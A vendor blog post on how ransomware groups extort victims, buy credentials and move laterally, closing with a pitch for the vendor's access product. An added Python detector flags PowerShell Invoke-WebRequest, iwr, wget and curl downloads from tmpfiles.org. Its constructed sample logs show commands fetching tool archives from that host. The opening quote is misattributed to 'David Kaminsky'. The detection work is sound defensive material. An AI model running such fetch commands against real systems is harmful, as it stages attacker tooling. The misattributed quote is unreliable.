4 Facts About Ransomware Groups that Use Lateral Movement
by Lori Ann Kruse, on Dec 14, 2022
“It is a fairly open secret that almost all systems can be hacked, somehow,” said the well-known internet security researcher David Kaminsky. “It is a less spoken of secret that such hacking has gone quite mainstream.” That statement certainly rings true in the current cyber threat landscape.
Global cyber attacks increased by 28% in the third quarter of 2022 compared to the same period in 2021, according to a Check Point Research report. The most recently available ransomware statistics cite an average ransom amount of $751,000 in 2021, a 52% increase over the previous year.
Ransomware groups are collections of individuals who share one goal: squeezing money out of their victims. The wider and stronger the attacker’s hold on the targeted organization, the better their chances of getting the demanded amount. To help you stay ahead of these groups, we’ve compiled a list of facts that can inform your security strategy.
Fact #1: There’s more than one way to extort money from victims
Most news stories about ransomware attacks are around a victim company’s files being locked up in the cyber attacker’s encryption. The organization is then told to pay in order to receive the decryption key. However, losing access to files is not the only extortion method.
Ransomware groups use multiple methods to get money from their targets. In addition to encrypting files, a group can demand payment both for the decryption key and for keeping the organization’s data from being sold. This is called the double-extortion attack model. If the attacker is not paid, they can release the victim’s data on the dark web, for free or for sale.
Building on the double-extortion model is the quadruple ransom technique. As the name suggests, this technique exploits victims in four ways:
- Encrypting company files
- Threatening to release sensitive information, usually to users on the dark web
- Launching denial-of-service (DoS) attacks against the victim’s website
- Contacting the company’s customers, business partners, employees, and the media to announce the hack
The multi-pronged ransom technique not only causes business outages for your employees and customers but also exposes data such as login credentials and other personally identifiable information (PII) to anyone on the dark web. Moreover, attackers take special care to damage your organization’s reputation among stakeholders.
Fact #2: Attackers don’t break in, they log in
Attackers can log into systems simply by buying compromised credentials. Some of the more involved methods that ransomware groups use to log into a system rely on social engineering; email and voice phishing are two well-known social engineering techniques.
Other ways to obtain usernames and passwords include enticing an employee of a big-name company to sell their credentials to the attacker. As part of this exchange, the employee agrees to approve the attacker’s access through their MFA method, serving as the ‘inside guy’ who lets the attacker into the victim’s systems. It’s important to note that, given these methods groups use to compromise credentials, password rotation, MFA, and credential vaulting would not keep an organization safe from this kind of attack.
Fact #3: Privilege escalation and lateral movement go hand-in-hand
Privilege escalation and lateral movement are techniques often used to encrypt massive amounts of the victim’s data. To facilitate this, malware is sometimes dropped during the reconnaissance phase to harvest credentials from the system, which the attackers then use to elevate their privileges and move laterally through the environment. Other times, privilege escalation and lateral movement tools are downloaded directly: for example, once an attacker is in, they trigger a download from tmpfiles.org using PowerShell’s Invoke-WebRequest cmdlet.
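As an added example (not code from the original post or from Remediant), the following Python scans PowerShell script-block log records for the download behaviour described above: Invoke-WebRequest, or one of its Windows PowerShell 5.1 aliases, fetching from the file-drop host named in the text. The pipe-delimited record format and the sample entries are constructed assumptions, not real telemetry.

```python
import re
from dataclasses import dataclass
from typing import List

# Host named in the post as a staging location for tooling; extend with your own threat-intel data.
FILE_DROP_HOSTS = {"tmpfiles.org"}

# Invoke-WebRequest plus the aliases Windows PowerShell 5.1 ships for it (iwr, wget, curl).
DOWNLOAD_CMDLET = re.compile(r"(?<![\w-])(Invoke-WebRequest|iwr|wget|curl)(?![\w-])", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class Finding:
    record_id: int
    user: str
    host: str
    severity: str  # "high" for a known file-drop host, "review" for any other download


def parse_record(line: str):
    """Constructed format: '<record id>|<user>|<script block text>' (a flattened script-block log entry)."""
    rid, user, script = line.split("|", 2)
    return int(rid), user, script


def inspect_script(record_id: int, user: str, script: str) -> List[Finding]:
    """Emit one finding per URL fetched by Invoke-WebRequest (or an alias) in a single script block."""
    if not DOWNLOAD_CMDLET.search(script):
        return []
    findings = []
    for host in URL_HOST.findall(script):
        host = host.lower()  # hostnames are case-insensitive; normalise before the lookup
        severity = "high" if host in FILE_DROP_HOSTS else "review"
        findings.append(Finding(record_id, user, host, severity))
    return findings


def scan_log(lines) -> List[Finding]:
    return [f for line in lines if line.strip() for f in inspect_script(*parse_record(line.strip()))]


# Constructed sample log for illustration only.
SAMPLE_LOG = [
    r"1|CORP\jdoe|Get-ChildItem C:\Users\jdoe\Documents",
    r"2|CORP\jdoe|Invoke-WebRequest -Uri https://tmpfiles.org/dl/1234/tools.zip -OutFile C:\Users\Public\t.zip",
    r"3|CORP\svc_backup|curl https://updates.example.com/agent.msi -OutFile agent.msi",
    r"4|CORP\jdoe|wget 'https://TMPFILES.org/dl/5678/x.zip' -OutFile x.zip",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f.severity}] record {f.record_id}: {f.user} downloaded from {f.host}")
```

Records 2 and 4 are flagged as high because they reach tmpfiles.org (the alias and mixed-case hostname are still caught); record 3 is surfaced for review only, and record 1 is ignored.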
Fact #4: Ransomware groups evolve
New ransomware groups emerge every year. Case in point: the Black Basta group emerged in spring 2022, LAPSUS$ was first identified in December 2021, DarkSide was initially observed in August 2020, and the Cuba ransomware group was first seen in December 2019.
Over their lifespans, ransomware groups adjust their tactics, techniques, and procedures (TTPs) as systems are patched and as defensive technologies advance. In other words, as soon as you think you have a nefarious actor figured out, they find another way to ravage your systems.
It’s pretty much a given that ransomware groups find ways to increase the efficacy of their attacks as independent entities. However, there is now evidence that groups collaborate and cooperate when selecting their targets; Sophos calls this phenomenon ‘coopetition.’ When this happens, the ransomware victim experiences multiple attacks from different groups in waves, or a single attack perpetrated by two or more ransomware groups working together.
The moral of this story is that cyber attackers who use ransomware are methodical and organized, and will target as many vulnerable organizations as possible. Moreover, preventing a ransomware attack isn’t always about who has the most expensive cybersecurity tooling or the highest SecOps headcount: attackers can still get into an environment through the human element, regardless of how much training you mandate.
That said, a layered defense consisting of cybersecurity training and a strong security culture; defensive strategies such as Zero Trust and threat-informed defense; and innovative technologies can significantly reduce both the likelihood and the blast radius of a successful attack.
Let’s end with one last point. Given the speed at which ransomware groups change their techniques, legacy technologies by themselves no longer stand up to the sophistication of current attacks (when I say legacy technologies, I’m looking at you, legacy PAM). Relying solely on vault-based credential management tools, password rotation, and MFA does not stop attacks from ransomware groups.
What modern organizations need to block this kind of attack is a PAM+ approach: a way to protect access rather than just usernames and passwords. PAM+ is not a specific tool, solution, or service, but a new approach to protecting access with Just-in-Time access that achieves Zero Standing Privilege. Want to learn more about how PAM+ capabilities can block ransomware attackers? Access the Remediant PAM+™ datasheet here.